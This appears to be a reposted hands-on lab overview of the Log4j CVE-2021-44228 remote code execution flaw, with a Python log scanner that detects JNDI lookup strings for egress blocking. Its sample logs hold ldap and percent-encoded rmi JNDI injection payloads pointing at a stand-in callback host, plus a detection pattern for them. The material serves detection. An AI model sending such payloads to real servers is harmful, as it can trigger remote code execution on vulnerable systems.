Log4j (CVE-2021-44228) Hands-on Lab
[Overview]
CVE-2021-44228 is a remote code execution (RCE) vulnerability in Apache Log4j 2.
An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. The crafted request uses a Java Naming and Directory Interface (JNDI) injection via a variety of services including:
- Lightweight Directory Access Protocol (LDAP)
- Secure LDAP (LDAPS)
- Remote Method Invocation (RMI)
- Domain Name Service (DNS)
If the vulnerable server uses log4j to log requests, the exploit will then request a malicious payload over JNDI through one of the services above from an attacker-controlled server.
Successful exploitation could lead to RCE.
In the case of Minecraft, users were able to exploit this vulnerability by sending a specially crafted message through Minecraft chat.
(Reference: https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability)
Log4j is a Java logging framework developed by the Apache Software Foundation: a Java-based logging utility used to record logs while a program runs.
On November 24, 2021, the Alibaba Cloud security team officially reported the Apache Log4j RCE (Remote Code Execution) vulnerability to Apache, after which it was designated CVE-2021-44228, with a CVSS score of 10.
The vulnerability is a JNDI (Java Naming and Directory Interface) injection flaw present in Log4j 2; abusing it makes RCE possible.
Vulnerable product versions:
Apache Log4j 2.0-beta9 through 2.14.1, all versions
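The following added example (not part of the original post or the Tenable write-up) scans request logs for JNDI lookup strings that use the four services listed in the overview and reports the callback host for egress blocking. The log lines, hostnames and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Services the overview lists as JNDI delivery channels.
JNDI_SCHEMES = ("ldap", "ldaps", "rmi", "dns")

# Matches ${jndi:<scheme>://<host>...}; scheme and prefix matched case-insensitively.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>" + "|".join(JNDI_SCHEMES) + r")://(?P<host>[^/:}\s]+)",
    re.IGNORECASE,
)


def decode_repeatedly(text, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (proxies may re-encode)."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi_lookups(log_lines):
    """Return (line_number, scheme, callback_host) for each lookup string found."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        for match in JNDI_RE.finditer(decode_repeatedly(line)):
            hits.append((number, match["scheme"].lower(), match["host"].lower()))
    return hits


# Constructed access-log lines (documentation IPs and example.net hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Dec/2021:01:02:03 +0900] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [14/Dec/2021:01:02:09 +0900] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://callback.example.net:1389/a}"',
    '203.0.113.9 - - [14/Dec/2021:01:02:11 +0900] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F'
    'callback.example.net%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.4 - - [14/Dec/2021:01:03:00 +0900] "GET /docs/jndi-overview HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme, host in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme} to {host}")
```

A hit only shows that a lookup string reached the logs; whether the host runs a Log4j version in the range above determines if it was acted on.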
from http://takudaddy.tistory.com/483 by ccl(A) rewrite - 2021-12-14 01:28:04